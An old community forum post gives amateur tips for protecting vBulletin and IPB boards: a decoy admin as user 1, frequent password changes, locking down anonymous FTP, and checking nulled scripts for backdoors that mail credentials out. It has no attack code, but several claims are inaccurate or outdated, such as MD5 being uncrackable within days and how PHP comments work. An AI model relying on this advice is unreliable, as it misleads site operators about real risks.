Jump to content
xisto Community
Sign in to follow this  
aloKNsh

Some Tips To Protect Your Forum From Being Hacked. specially for VB and IPB but can be for all kinda boards.

Recommended Posts

The hackers are kind of interested on the various forums which are highly apperciated and are popular in the net. Its a child play for a person to get the forum if he knows the basics of the forum and have the correct resource. Cracking in with the password i think is a hard job so the most possibly they enter through the hash cracking code. There are tons of scripts avilale on the net offering ways to get the md5 hash code of the member. MD5 hash is a kind of password encrypted in some unknown pattern which can only broked by an expert. The scripts are generally run in the perl based os platform and through it they attack the forum. Its but general that the forum will have its 1st member as admin (most probably)which makes it easy for the hackers to get in the hash code. The just enter the name of the admin and the number of the user i mean the member number which is genrally 1 for the admin in almost all the forums which play a big role in getting the codes cracked. If we try to put some general members which are not having power like a registered user instead of admin and admin being somewhere in the 6th or 7th number then it will make a bit diffcult for a hacker to get in the correct username and the registerd number. Now you would think how to make it done. Its simple first make your own forum then make a admin which is the first user. Register some more almsot 2 or 3 users then again make one more user which is also the admin of the forum and via loogin in the forum from the 6 or 7th member will allow to revoke the privilage of the admin from the first member. Let the name of the first member be admin but the powers are not of admin. It will make the hackers think that the 1st mebmber is admin and they will enter the username with the number 1. If everything is rite then they might get the md5 hash code which can be cracked by a professional. There are many sites offering md5 cracking and also for free. You will just need to submit your code and wait for the member or hacker to crack the code and once its cracked they will post in their site which is public and then you can try to enter that password which is simple word or general unencrypted password with username as admin. Once he is in he would probably rejoice for a min but when he finds out that the 1st member was not the admin but just a mask of admin he will probably get frustrated and move out of the forum or will again try to get in. This time its obvious that he or she will get the correct number of admin and the real admin by just looking at the forum leaders. He will again follow the same process and will get the md5 code and will give it to a md5 hacker to break it which will take another week for them to break. So its advicible to change the password of the admins and mods every after 7 to 10 days because if he is able to get the md5 breaked he will probably try to get in the account but if the password is changed every week then i think its impossible to get the forum hack as no site offers fast md5 crack and no one can crack in less than 5 days so it will give the wrong password error and your forum is safe. He will try everyweek but as the password is also changed every week so its almost impossible for the coder to get in the forum and fulfill his dreams.Another big issue is that of the faulting with the db of the forum. This can be done only if he has the access to the ftp account in your server. So whenevr you get a new site the firstjob you should do is to make the ftp privte and only the one having the password and username can enter in the ftp account. THe ftps let you get the files in the server and the again upload it in there without letting you know. By defult the ftp accounts are closed but in some case the account has an ftp account as annonymous and pass as annonymous which is easy for a geek to guess. SO the next time you get a site first remove the ftp permissions and also keep changing the password at the interval of 2 to 3 weeks. Its a good practice not to say that its a granted practice that your account will be safe but jsut to say that your account can be a safer than all others. Next the hackers target the mods and the smods as they just dont care much about the forum as much as the admins and some special members so getting their password via md5 hash is easy as they are most likely not to change the password. So next time you get a mod for your forum ask them strictly to change the password in every 6 to 7 days.Next tip is that never use a null script and if you are using then kindly go through the full script nicely as there are chances of the scripts having a back door entery option means the developer of the script might have coded a line to get the admins username and pass evrytime that script is installed and the mail goes automatically to the developer having the username and the pass of the script. It is advicible to go through the script nicely and check the script more carefully on the admin page and general index pages as it has the most chances of having those crap codes which will steal your data and sent is to the original owner. So whenever you go through a script before installing it in forum try to look for something like [...@..] generally the coders code it that as soon as the script is run the script automatically finds some of the lines which matches its predefined template and if it get the line it sends it to the owner. SO next time you go through thr script kindly look for those kinda notes and if you see any just remove that code or if in php then add // before and after the code. It will make the code a statement and the script will ignore that line. But be aware some of the script will have this as their contact us page and you dont like to destroy the cotact us page so kindly use your own common sense also. Last but not the least its not 100% sure that if you follow all this steps you will have your forum protected but it will make the forum almost protected at least better than the others. But the hacker who is just crazy about your forum be aware it can he hacked by some kinda new method which i dont know so use your own brain and keep your self up to date to save your self and your forum from being hacked. regards alok.

Share this post


Link to post
Share on other sites

Create an account or sign in to comment

You need to be a member in order to leave a comment

Create an account

Sign up for a new account in our community. It's easy!

Register a new account

Sign in

Already have an account? Sign in here.

Sign In Now
Sign in to follow this  

×
×
  • Create New...

Important Information

Terms of Use | Privacy Policy | Guidelines | We have placed cookies on your device to help make this website better. You can adjust your cookie settings, otherwise we'll assume you're okay to continue.